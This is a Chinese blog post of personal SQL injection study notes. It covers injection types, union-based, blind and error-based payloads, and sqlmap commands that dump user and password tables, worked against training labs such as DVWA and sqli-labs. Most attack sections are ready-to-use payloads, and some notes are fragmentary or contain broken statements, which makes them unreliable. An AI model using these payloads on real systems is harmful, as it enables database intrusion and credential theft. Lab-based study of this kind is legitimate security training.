



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
<meta name="msvalidate.01" content="9EBC90696DDD6D995901F1695D5C0A38" />
<meta name="baidu-site-verification" content="codeva-kMcy1s0JgQ" />
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="简单の博客" href="http://example.com/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="简单の博客" href="http://example.com/atom.xml" />
<link rel="alternate" type="application/json" title="简单の博客" href="http://example.com/feed.json" />
<meta name="Keywords" Content="">
<meta name="Description" Content="">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  

<link rel="canonical" href="http://example.com/2023/05/09/sql%E6%B3%A8%E5%85%A5/">



  <title>简单の博客</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">sql注入
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2023-05-09 19:43:23">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2023-05-09T19:43:23+08:00">2023-05-09</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">hello world</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://image.baidu.com/search/down?url=https://lz.sinaimg.cn/large/6833939bly1gicitcxhpij20zk0m8hdt.jpg"></li>
          <li class="item" data-background-image="https://image.baidu.com/search/down?url=https://lz.sinaimg.cn/large/6833939bly1gipetlbztpj20zk0m84qp.jpg"></li>
          <li class="item" data-background-image="https://image.baidu.com/search/down?url=https://lz.sinaimg.cn/large/6833939bly1giclxxcb6rj20zk0m8b29.jpg"></li>
          <li class="item" data-background-image="https://image.baidu.com/search/down?url=https://lz.sinaimg.cn/large/6833939bly1giciuv0socj20zk0m8qes.jpg"></li>
          <li class="item" data-background-image="https://image.baidu.com/search/down?url=https://lz.sinaimg.cn/large/6833939bly1gicli9lfebj20zk0m84qp.jpg"></li>
          <li class="item" data-background-image="https://image.baidu.com/search/down?url=https://lz.sinaimg.cn/large/6833939bly1giclfdu6exj20zk0m87hw.jpg"></li>
        </ul>
      </div>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    </header>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="http://example.com/2023/05/09/sql%E6%B3%A8%E5%85%A5/">

<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="https://avatars.githubusercontent.com/u/116647725?s=400&u=c1d12fb27b36682d1ce63e666ba3ed2684c6cc3c&v=4">
  <meta itemprop="name" content="Kobe_">
  <meta itemprop="description" content="我喜欢老歌老朋友和一直爱我的人, ">
</span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="简单の博客">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="常见sql注入类型"><a href="#常见sql注入类型" class="headerlink" title="常见sql注入类型"></a>常见sql注入类型</h1><h2 id="一按注入点区分"><a href="#一按注入点区分" class="headerlink" title="一按注入点区分"></a>一<em><strong>按注入点区分</strong></em></h2><p><strong>1、数字型注入</strong><br>数字型注入主要存在于网站的<strong>url</strong>中有?id&#x3D;处，如：<span class="exturl" data-url="aHR0cDovL3h4eC5jb20vaW5kZXgucGhwP2lkPTE=">http://xxx.com/index.php?id=1</span> 通过改变id&#x3D;的数值来判断是否有注入点</p>
<p>2、字符型注入<br>字符型注入常见于用户登录页面或页面url中有?username&#x3D;aaa 或者?password&#x3D;aaa 如：<span class="exturl" data-url="aHR0cDovL3h4eC5jb20vaW5kZXgucGhwP3VzZXJuYW1lPWFhYSZwYXNzd29yZD1iYmIlRUYlQkMlOEMlRTUlQUYlQjklRTQlQkElOEUlRTUlQUQlOTclRTclQUMlQTYlRTUlOUUlOEIlRTYlQjMlQTglRTUlODUlQTUlRUYlQkMlOEMlRTUlQjglQjglRTglQTclODElRTclOUElODQlRTYlODklOEIlRTYlQUUlQjUlRTQlQjglQkElRTklODAlOUElRTglQkYlODclRTklOTclQUQlRTUlOTAlODglRTclQUMlQTYlRTUlOTIlOEMlRTYlQjMlQTglRTklODclOEElRTclQUMlQTYlRTclOUElODQlRTklODUlOEQlRTUlOTAlODglRUYlQkMlOEMlRTclQkIlOTUlRTglQkYlODclRTclOTQlQTglRTYlODglQjclRTUlOTAlOEQlRTUlOTIlOEMlRTUlQUYlODYlRTclQTAlODE=">http://xxx.com/index.php?username=aaa&amp;password=bbb，对于字符型注入，常见的手段为通过闭合符和注释符的配合，绕过用户名和密码</span></p>
<p>3、搜索型注入&#x3D;&#x3D;没见过&#x3D;&#x3D;<br>搜索型相比于数字型和字符型而言，较为特殊点，主要是进行搜索时网站没过滤搜索关键字，常见于url中的 “keyword&#x3D;” 。生成的 SQL 语句：select * from 表 where 字段 like ‘%关键字%’ ，注入时，可以构造sql注入语句：select * from 表名 where 字段 like ‘%关键字%’ and ‘%1%’&#x3D;‘%1%’，进行注入。</p>
<h2 id="二按提交方式区分"><a href="#二按提交方式区分" class="headerlink" title="二按提交方式区分"></a>二<em><strong>按提交方式区分</strong></em></h2><p><strong>1、GET 注入</strong><br>按提交方式区分的话，GET注入是最简单的注入，不需要额外的工具。GET提交数据的方式的特点是将用户操作生成的语句<strong>直接显示在url</strong>上</p>
<p><strong>2、POST 注入</strong><br>使用POST提交的页面通常需要一定的保密性，常见于用户登录页面，用户操作生成的语句<strong>不会直接显示在url中，而是会存在于表单中</strong>，需要通过<strong>抓包</strong>才能获取</p>
<p><strong>3、Cookie 注入</strong>&#x3D;&#x3D;没见过&#x3D;&#x3D;<br>Cookie，存在用户本地客户端的数据集合，HTTP 请求表单中会带上客户端的 Cookie, 注入点存在 于Cookie 当中的某个字段中。和POST一样，Cookie也要通过抓包来查看。</p>
<h2 id="三按页面执行反馈区分"><a href="#三按页面执行反馈区分" class="headerlink" title="三按页面执行反馈区分"></a>三<em><strong>按页面执行反馈区分</strong></em></h2><p>1、布尔注入<br>很多时候，sql服务器并不会直接反馈查询内容，而是通过反馈一个布尔参数给网站服务器，然后再由网站服务器将内容反馈到浏览器，也就是用户眼前，而布尔类型只有两个参数，ture和false，此时可通过配合猜解函数如sleep(),if（），ascll（）， length（）等，来判断注入操作的效果。<br>2、时间注入<br>和布尔注入一样，由于不直接反馈出入操作的内容，从而通过执行时间来间接猜解注入效果。常用sleep（）、if（）、ascll()的等函数猜解，如：if（length(database()) &#x3D;8,sleep(5),sleep(0)）意为：如果数据库的长度等于8，那么页面休眠5秒，否则不休眠。页面休眠一般指页面处于正在刷新状态。<br>3、基于报错注入<br>页面反馈操作的错误信息，有的会直接把错误的sql语句反馈在页面中。<br>常见报错注入点在：单&#x2F;双引号、数字型注入</p>
<h1 id="SQL注入的实现方式"><a href="#SQL注入的实现方式" class="headerlink" title="SQL注入的实现方式"></a>SQL注入的实现方式</h1><ul>
<li>手动：人为通过先查找注入点，找到哪些地方可以注入SQL语句，找到以后进行人工操作，人工输入一些SQL常用的注入组合语法，进行注入</li>
<li>自动：利用工具代替人工扫描注入点，然后工具自动尝试各种组合语法，实现注入</li>
</ul>
<h2 id="SQL注入流程"><a href="#SQL注入流程" class="headerlink" title="SQL注入流程"></a>SQL注入流程</h2><p>收集项目信息【操作系统（Windows还是Linux）、数据库类型、web服务器类型】<br>        查找注入点【使用 ‘ # 转移字符\ 等去查找，尤其是’ 单引号】<br>         注入sql语句【使用关联语句等】<br>         获取数据库信息【获取表信息，在获取库信息】<br>         破解数据库管理员账号密码<br>         开始 sql shell 等工具登录并获取数据SS</p>
<p>QL注入 - 特殊库</p>
<ol>
<li>数据库库名：information_schema，用于存储 MySQL 中所有的库名，表名，列名，是 MySQL 数据的字典</li>
<li>因此 SQL注入 经常会从此库中获取需要的库名、表名、字段名</li>
<li>还有 tables表（记录MySQL库中所有的表）、columns表（记录MySQL库中所有的表和列）</li>
<li>1<img data-src="https://img-blog.csdnimg.cn/20200721110525287.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0tvYmVfaw==,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></li>
</ol>
<hr>
<ul>
<li><p>如何在特殊库中获得 show databases 相同的效果呢？</p>
</li>
<li><p>如何在特殊库中获得 show tables 相同的效果呢？</p>
</li>
<li><pre><code># 效果等同于 show databases
# 查询 TABLE_SCHEMA 字段 同时使用 DISTINCT 去重
select DISTINCT TABLE_SCHEMA from information_schema.TABLES;

# 效果等同于 show tables
# 查询 TABLE_NAME 字段，同时使用 DISTINCT 去重
select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=&#39;library&#39;;

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">  注： library是变量 </span><br><span class="line"></span><br><span class="line">## sql注入演示</span><br><span class="line"></span><br><span class="line">```mysql</span><br><span class="line">难度low</span><br><span class="line">#正确步骤：</span><br><span class="line">-- 步骤一 获取当前连接的数据库的版本和名称</span><br><span class="line">1&#x27; or 1=1 union select version(),database() #</span><br><span class="line">-- 2 获取当前连接数据库的用户：</span><br><span class="line">1&#x27; union select 1,user() #</span><br><span class="line">-- 可做可不做 获取服务器的操作系统和存储目录：</span><br><span class="line">1&#x27; union select @@version_compile_os,@@datadir #</span><br><span class="line">&#x27;-- 步骤二 获取数据库中所有的数据库名</span><br><span class="line">			-- information_schema. schema：记录所有库名信息的表</span><br><span class="line">-- 	步骤三 查询information_schema表中有用信息</span><br><span class="line">1&#x27; union select 1,schema_name from information_schema.schemata #</span><br><span class="line">在这里权限不够，所以没查出来</span><br><span class="line">			-- :记录所有表名 ：information_schema.tables</span><br><span class="line">1&#x27; union select table_name ,1 from information_schema.tables WHERE table_schema=&#x27;dvwa&#x27; # </span><br><span class="line"></span><br><span class="line">			-- 记录所有列名 ：information_schema.columns： </span><br><span class="line">1&#x27; union select 1,column_name FROM information_schema.columns where table_name=&#x27;users&#x27; and table_schema=&#x27;dvwa&#x27; 	#</span><br><span class="line"></span><br><span class="line">-- 			展示列名更好的方法：用group_concat()将这些字段名简单的输出：</span><br><span class="line">1&#x27; union select 1, group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;and table_schema=&#x27;dvwa&#x27; #</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">--  步骤四： 获取密码还有user——id</span><br><span class="line">&#x27; union select user_id,concat(user,&#x27;----&#x27;,password) from dvwa.users #</span><br></pre></td></tr></table></figure>
</code></pre>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">难度low</span><br><span class="line">#正确步骤：</span><br><span class="line">-- 步骤一 获取当前连接的数据库的版本和名称</span><br></pre></td></tr></table></figure>

<h2 id="sqlmap注入演示"><a href="#sqlmap注入演示" class="headerlink" title="sqlmap注入演示"></a>sqlmap注入演示</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">1获取数据库</span><br><span class="line">python sqlmap.py -r D:\phpstudy_pro\WWW\sqltest.txt --current-db</span><br><span class="line">2获取表名</span><br><span class="line">python sqlmap.py -r D:\phpstudy_pro\WWW\sqltest.txt --tables -D dvwa</span><br><span class="line">3获取字段名</span><br><span class="line">python sqlmap.py -r D:\phpstudy_pro\WWW\sqltest.txt --columns -T users -D dvwa</span><br><span class="line">4获取数据</span><br><span class="line">python sqlmap.py -r D:\phpstudy_pro\WWW\sqltest.txt --dump -C user,password  -T users -D dvwa</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="为什么用单引号测试"><a href="#为什么用单引号测试" class="headerlink" title="为什么用单引号测试"></a>为什么用单引号测试</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">   </span><br></pre></td></tr></table></figure>

<h2 id="结果集只有一个回显"><a href="#结果集只有一个回显" class="headerlink" title="结果集只有一个回显"></a>结果集只有一个回显</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">1</span><br><span class="line">想一个办法使没有回显，</span><br><span class="line">2</span><br><span class="line">limit 0，1  limit 0，2 limit 0，3</span><br><span class="line"></span><br><span class="line">3</span><br><span class="line">使用group_concat()函数</span><br></pre></td></tr></table></figure>

<h2 id="判断注入类型的方法"><a href="#判断注入类型的方法" class="headerlink" title="判断注入类型的方法"></a>判断注入类型的方法</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">最终解释：</span><br><span class="line">正常情况下select * from user where id= $</span><br><span class="line">字符串的情况下 select * from user where id= &quot;$&quot;</span><br><span class="line">      当输入 1’ and 1=1时select * from user where id= ‘1’ and 1=1#&quot;</span><br><span class="line">      有语句正常 没有报错</span><br><span class="line">但是注入时数字的情况下 select * from user where id= $</span><br><span class="line">      当输入 1’ and 1=1时select * from user where id= 1’ and 1=1 #</span><br><span class="line">      语句有一个单引号会报错</span><br></pre></td></tr></table></figure>

<h2 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">1</span><br><span class="line">使用逻辑&quot;AND&quot;运算符（例如&quot;AND&quot;、&quot;&amp;&amp;&quot;）连接多个条件时，只有在前面的条件为真时，才会继续执行后面的条件</span><br><span class="line">2</span><br><span class="line">SLEEP(1) 是一种用于测试时间延迟的函数。它会使查询在执行时暂停指定的时间（以秒为单位），然后再继续执行。</span><br><span class="line">3</span><br><span class="line">substr（字符串，正常下标，子字符串个数）</span><br><span class="line">盲注语句</span><br><span class="line">1‘or sleep（1）#</span><br><span class="line"> iron ’ and length（database（））=1  and sleep（1）#</span><br><span class="line"> </span><br></pre></td></tr></table></figure>

<h2 id="时间注入脚本"><a href="#时间注入脚本" class="headerlink" title="时间注入脚本"></a>时间注入脚本</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="sql套路"><a href="#sql套路" class="headerlink" title="sql套路"></a>sql套路</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">使用不同的编码级</span><br></pre></td></tr></table></figure>

<h2 id="杂七杂八"><a href="#杂七杂八" class="headerlink" title="杂七杂八"></a>杂七杂八</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">首先如果 from bwapp.heroes 找不到这表，这样的话 就直接from heroes</span><br><span class="line">判断行数 可以不考虑是否能有正确回显，</span><br><span class="line">	例如 出现Error: The used SELECT statements have a different 	number of columns 则代表行数不正确</span><br><span class="line">	如果显示别的内容则代表行数正确</span><br><span class="line">	在MySQL中，字符串会被转换为0，而布尔类型的值会被转换为1或0。</span><br><span class="line">   扩展（当多个字段被返回时，结果集通常是以行的形式组织的，每行代表一个记录，每个字段的值都是以字符串的形式表示的。每个字段的数据类型可能是字符串、数字、日期等，根据数据库中字段的定义而定。）</span><br><span class="line">   </span><br><span class="line">  %23是 URL 编码中表示 # 字符的方式</span><br><span class="line">   </span><br></pre></td></tr></table></figure>



<h2 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">sleep（）</span><br><span class="line">substr（） 约等于 mid（）</span><br><span class="line">count（）</span><br><span class="line">ascill（）</span><br><span class="line">length（）</span><br><span class="line"></span><br><span class="line">floor（）</span><br><span class="line">updatexml（） extractvalue () 注入数据</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="报错注入条件"><a href="#报错注入条件" class="headerlink" title="报错注入条件"></a>报错注入条件</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">BigInt 数据类型溢出</span><br><span class="line">---而 BigInt 数据类型通常用于存储数值型数据，例如表示整数值的字段。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">updatexml（），extractvalue ()函数</span><br><span class="line">--如果在使用updatexml()函数时不正确处理输入数据，就会导致SQL注入漏洞。</span><br><span class="line">	1	当应用程序将用户提供的数据作为updatexml()函数的参数而没有进行充分的		   验证和过滤时。</span><br><span class="line">	2	当应用程序在构造updatexml()函数的参数时使用动态拼接的方式，并且未对		   用户输入进行充分的转义或参数绑定。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">主键重复方式的报错注入利用的函数有： floor() + rand() + group() + count()</span><br><span class="line">-- 应用程序在执行插入，更新数据操作时，使用了带有floor()函数的查询语句，并且没有正确处理主键重复的情况。如果应用程序在插入数据时没有对主键进行适当的验证，</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>十种报错注入图</strong></p>
<p><img data-src="/../../AppData/Roaming/Typora/typora-user-images/image-20230525211217275.png" alt="报错图"></p>
<h3 id="bigint报错"><a href="#bigint报错" class="headerlink" title="bigint报错"></a>bigint报错</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">?id=1&quot; and exp(~(select * from (select user())a)) --+</span><br><span class="line">先查询select user()这个语句的结果，然后将查询出来的数据作为一个结果集取名为a</span><br><span class="line"></span><br><span class="line">然后在查询select * from a 查询a，将结果集a全部查询出来</span><br><span class="line"></span><br><span class="line">  （在MySQL中，字符串会被转换为0，而布尔类型的值会被转换为1或0。）</span><br><span class="line"></span><br><span class="line">查询完成，语句成功执行，返回值为0，再取反(~按位取反运算符)，exp调用的时候e的那个数的次方，就会造成BigInt大数据类型溢出，就会报错</span><br><span class="line"></span><br><span class="line">获取表名：</span><br><span class="line"></span><br><span class="line">?id=1&quot; and exp(~(select * from (select table_name from information_schema.tables where table_schema=database() limit 0,1)a)) --+</span><br><span class="line">获取列名：</span><br><span class="line"></span><br><span class="line">?id=1&quot; and exp(~(select * from (select column_name from information_schema.columns where table_name=&#x27;users&#x27; limit 0,1)a)) --+</span><br><span class="line">获取列名对应信息：</span><br><span class="line"></span><br><span class="line">?id=1&quot; and exp(~(select * from(select username from &#x27;users&#x27; limit 0,1))) --+</span><br><span class="line">   解释：  用于提取 &#x27;users&#x27; 表中的第一个用户名（根据 limit 0,1 子句）。通过使用 exp() ~，将结果转换为布尔值。通过观察应用程序的响应，根据查询结果是否为真或假来推断列名的信息。</span><br></pre></td></tr></table></figure>

<h3 id="updatexml（），extractvalue-函数"><a href="#updatexml（），extractvalue-函数" class="headerlink" title="updatexml（），extractvalue ()函数"></a>updatexml（），extractvalue ()函数</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">就需要构造Xpath_string格式错误，updatexml()函数语法：updatexml(XML_document,Xpath_string,new_value)</span><br><span class="line">	XML_document:是字符串String格式，为XML文档对象名称</span><br><span class="line">	Xpath_string:Xpath格式的字符串</span><br><span class="line">	new_value:string格式，替换查找到的符合条件的数据</span><br><span class="line">	</span><br><span class="line">    </span><br><span class="line">补充：：0x7e 对应的 ASCII 字符 ~</span><br><span class="line">查询当前数据库的用户信息以及 数据库版本信息:</span><br><span class="line">&#x27; or updatexml(1,concat(0x7e,database()),2) or&#x27;</span><br><span class="line">’ and updatexml(1,concat(0x7e,user(),0x7e,version(),0x7e),3) --+</span><br><span class="line">获取当前数据库下数据表信息：</span><br><span class="line">&#x27; or updatexml(1,concat(0x7e,(select  group_concat(table_name)  from information_schema.tables where table_schema=database() limit 0,1),0x7e),3) --+</span><br><span class="line">获取users表名的列名信息：</span><br><span class="line">&#x27; or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27; limit 0,1),0x7e),3) --+</span><br><span class="line">获取users数据表下username、password两列名的用户字段信息:</span><br><span class="line">&#x27; or updatexml(1,concat(0x7e,(select login from users limit 0,1),0x7e),3) --+</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">extractvalue()函数语法:extractvalue(XML_document,XPath_string)</span><br><span class="line"></span><br><span class="line">获取当前是数据库名称及使用mysql数据库的版本信息：</span><br><span class="line">&#x27; or extractvalue(1,concat(0x7e,database(),0x7e,version(),0x7e)) --+</span><br><span class="line"></span><br><span class="line">获取当前位置所用数据库的位置：</span><br><span class="line">&#x27; or extractvalue(1,concat(0x7e,@@datadir,0x7e)) --+</span><br><span class="line"></span><br><span class="line">获取表名：</span><br><span class="line">&#x27; or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e)) --+</span><br><span class="line"></span><br><span class="line">获取users表的列名：</span><br><span class="line">&#x27; or extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name=&#x27;users&#x27; limit 0,1),0x7e)) --+</span><br><span class="line"></span><br><span class="line">获取对应的列名的信息(username/password):</span><br><span class="line">&#x27; or extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e)) --+</span><br></pre></td></tr></table></figure>

<h2 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">先猜解数据库名长度</span><br><span class="line">	iron man&#x27;and length(database())=5%23</span><br><span class="line">测出数据库名的第一个字母ascii为96(b)</span><br><span class="line">		iron man&#x27;and ascii(substr(database(),1,1))=98#</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="sqli-labs靶场"><a href="#sqli-labs靶场" class="headerlink" title="sqli-labs靶场"></a>sqli-labs靶场</h1><h3 id="第一关"><a href="#第一关" class="headerlink" title="第一关"></a>第一关</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">id=1’</span><br><span class="line">	判断字段数</span><br><span class="line">id=1&#x27; or 1=1 union select 1,2 ,3 --+</span><br><span class="line">	为了判断字段位置</span><br><span class="line">id=-1&#x27; union select 1,2 ,3 --+</span><br><span class="line">id=999&#x27; union select 1,2 ,3 --+</span><br><span class="line">	数据库 security</span><br><span class="line">id=999&#x27; union select 1,database（）,3 --+</span><br><span class="line">	表名 emails,referers,uagents,users</span><br><span class="line">id=-1&#x27; union select 1,GROUP_CONCAT(DISTINCT(table_name)) ,3 from information_schema.tables WHERE table_schema=database() --+</span><br><span class="line">	id,password,username</span><br><span class="line">id=-1&#x27; union select 1,GROUP_CONCAT(DISTINCT(column_name)) ,3 from information_schema.columns WHERE table_schema=database() and table_name=&#x27;users&#x27; --+</span><br><span class="line"> 最终结果</span><br><span class="line"> id=-1 &#x27; union 1,group_concat(usernamer),group_concat(password) from security.user--+</span><br><span class="line"> </span><br></pre></td></tr></table></figure>

